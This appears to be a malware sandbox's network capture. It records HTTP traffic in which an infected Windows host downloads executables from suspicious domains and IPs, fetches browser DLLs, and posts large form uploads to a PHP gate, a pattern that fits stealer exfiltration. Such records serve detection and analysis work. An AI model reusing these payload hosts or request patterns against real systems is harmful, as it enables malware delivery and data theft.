Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 05:19:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PCm9Fa9lGPfhycYDNLGlFTYwNNm9ONX0b2xzYIMVIpGSQ7%2BTUVUnOvwPS%2FMzCKIGNoz9CSgF5i1Nl8YJFQQ8atAMnNn0EUfgasEMOia%2BKtbUcaGgvK9Uqgh%2FpP99kg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 833b468e497929d2-FUK

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: IOIOUOIUOUOUIYJGROUP.SBS Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 05:20:06 GMT Content-Type: application/x-msdos-program Content-Length: 2891536 Connection: keep-alive Last-Modified: Mon, 11 Dec 2023 03:52:07 GMT ETag: "2c1f10-60c33db9367c0" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 3836 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nbIMOFkj2xb4b3kKtbICG99Xts0J1IDvqa23sJYRzvNUyiPTku1W%2Fh8F4d0qYJ%2BrrnueVwm3wBzQKkDsUFA3k8uNUQoeq%2Fm9MOb3TaxoX18f4AjfAeRVe2Ysoconz1Z96%2F6R8r6tEcAsXCc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 833b46cab8a769c1-LAX alt-svc: h3=":443"; ma=86400

GET /1Gemv7.mp3 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: iplis.ru

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 05:21:02 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive memory: 0.4205169677734375 expires: Mon, 11 Dec 2023 05:21:02 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: BYPASS Set-Cookie: 289290482949678744=2; expires=Wed, 11 Dec 2024 05:21:02 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=175.208.134.152; expires=Wed, 11 Dec 2024 05:21:02 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JMiTJc6mB2nTKyKYwmBV3BAqkyyqWCKK%2FQYz%2BF02EYjf2EqFZ9ig%2FpDqsWTilGYHyYR2Q1lwdTPDa6w1w4BnTQ3%2FozERkMBCm94kasb3n8cBGbW9xJ3qdGC5Gg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 833b48245d490fd8-LAX alt-svc: h3=":443"; ma=86400

GET /demo/home.php?s=175.208.134.152 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 05:21:03 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive x-iplb-request-id: AC46C796:D564_93878F2E:0050_65769C3F_383B2AF:BDCA x-iplb-instance: 30782 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xd%2BAiQlFfymFnz2pP15XgFGmP%2FFD9U8FmsqS%2FcBcnvLqWfucHYQURfOcXbOQiwrKTrpNUXcYWwCLTcunIZflR6XFnD9JMYujQ0G2xelrAWCI24pq3RREycSzYQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 833b4829ab5829d1-FUK alt-svc: h3=":443"; ma=86400

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 195.20.16.45

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 05:19:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 133 Host: 195.20.16.45

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 05:19:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 133 Host: 195.20.16.45

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 05:20:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Content-Length: 4608 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /timeSync.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 5.42.64.35 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 05:20:05 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 11 Dec 2023 05:15:02 GMT ETag: "53800-60c35041df9b6" Accept-Ranges: bytes Content-Length: 342016 Content-Type: application/x-msdos-program

HEAD /autorun.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 193.233.132.34 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 334152 Accept-Ranges: bytes Server: HFS 2.3m Set-Cookie: HFS_SID_=0.526878894772381; path=/; HttpOnly ETag: 462E8B57B955A0825A459AFA9F634EAF Last-Modified: Mon, 11 Dec 2023 07:27:14 GMT Content-Disposition: attachment; filename="autorun.exe";

HEAD /moda/good.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 109.107.182.3 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:20:05 GMT Content-Type: application/octet-stream Content-Length: 1652445 Last-Modified: Mon, 11 Dec 2023 05:18:01 GMT Connection: keep-alive ETag: "65769b89-1936dd" Accept-Ranges: bytes

HEAD /order/tuc6.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: never.hitsturbo.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 05:20:06 GMT Content-Type: application/octet-stream Content-Length: 7244729 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=tuc6.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zvOvdjkkSzTeE3FglpOSS0SKQ21L0%2F%2BMMWvJ2bC9RtdnKNhIF85Q8deWqxapklEcu9j%2BY2uPILvJjnLF0UMXfU6A2zPpFpNt%2FryOOkNVOhlV55tjneSmrrzZmF0BgiC%2BSlJZz7ed"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 833b46c2dbda3185-LAX alt-svc: h3=":443"; ma=86400

GET /timeSync.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 5.42.64.35 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 05:20:06 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 11 Dec 2023 05:15:02 GMT ETag: "53800-60c35041df9b6" Accept-Ranges: bytes Content-Length: 342016 Content-Type: application/x-msdos-program

GET /moda/good.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 109.107.182.3 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:20:06 GMT Content-Type: application/octet-stream Content-Length: 1652445 Last-Modified: Mon, 11 Dec 2023 05:18:01 GMT Connection: keep-alive ETag: "65769b89-1936dd" Accept-Ranges: bytes

GET /order/tuc6.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: never.hitsturbo.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 05:20:06 GMT Content-Type: application/octet-stream Content-Length: 7244729 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=tuc6.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ipL5EN3SAKeofraz2MOfMdU4OxlgLABJyHswt2PwMRcOx9b5iHAG3A9Ad6m3uS%2BcckBmjel84eMiW6qJhNTssPUD%2BWinqC0wZRCzN4Bkf5Y2mdNVnFVbJc4Xi5Zfiz2Eg%2BE1B3EH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 833b46c67ea13185-LAX alt-svc: h3=":443"; ma=86400

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Mon, 11 Dec 2023 06:20:06 GMT Date: Mon, 11 Dec 2023 05:20:06 GMT Connection: keep-alive

GET /autorun.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 193.233.132.34 Cache-Control: no-cache Cookie: HFS_SID_=0.526878894772381

HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 334152 Accept-Ranges: bytes Server: HFS 2.3m ETag: 462E8B57B955A0825A459AFA9F634EAF Last-Modified: Mon, 11 Dec 2023 07:27:14 GMT Content-Disposition: attachment; filename="autorun.exe";

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 541 Host: 195.20.16.45

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 05:20:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 133 Host: 195.20.16.45

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 05:21:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFIDGCFHIEHJJJJECAK Host: 5.42.64.41 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 144 Connection: keep-alive Vary: Accept-Encoding

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHI Host: 5.42.64.41 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Mon, 11 Dec 2023 06:21:03 GMT Date: Mon, 11 Dec 2023 05:21:03 GMT Connection: keep-alive

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHC Host: 5.42.64.41 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5412 Connection: keep-alive Vary: Accept-Encoding

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDH Host: 5.42.64.41 Content-Length: 4851 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

GET /2a7743b8bbd7e4a7/sqlite3.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:07 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBKJEGIEBFHCAAKKEBA Host: 5.42.64.41 Content-Length: 355 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

GET /2a7743b8bbd7e4a7/freebl3.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:10 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes

GET /2a7743b8bbd7e4a7/mozglue.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:12 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes

GET /2a7743b8bbd7e4a7/msvcp140.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:13 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes

GET /2a7743b8bbd7e4a7/nss3.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:14 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes

GET /2a7743b8bbd7e4a7/softokn3.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:16 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes

GET /2a7743b8bbd7e4a7/vcruntime140.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:17 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAEBGHDBKEBGIDHJJEHC Host: 5.42.64.41 Content-Length: 943 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCGIJKJJKEBGHJKFIDGC Host: 5.42.64.41 Content-Length: 879 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFI Host: 5.42.64.41 Content-Length: 663 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFH Host: 5.42.64.41 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1576 Connection: keep-alive Vary: Accept-Encoding

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE Host: 5.42.64.41 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2036 Connection: keep-alive Vary: Accept-Encoding

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJ Host: 5.42.64.41 Content-Length: 383 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKF Host: 5.42.64.41 Content-Length: 885855 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECGIEBAEBFIIECBGCBG Host: 5.42.64.41 Content-Length: 776999 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 05:21:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive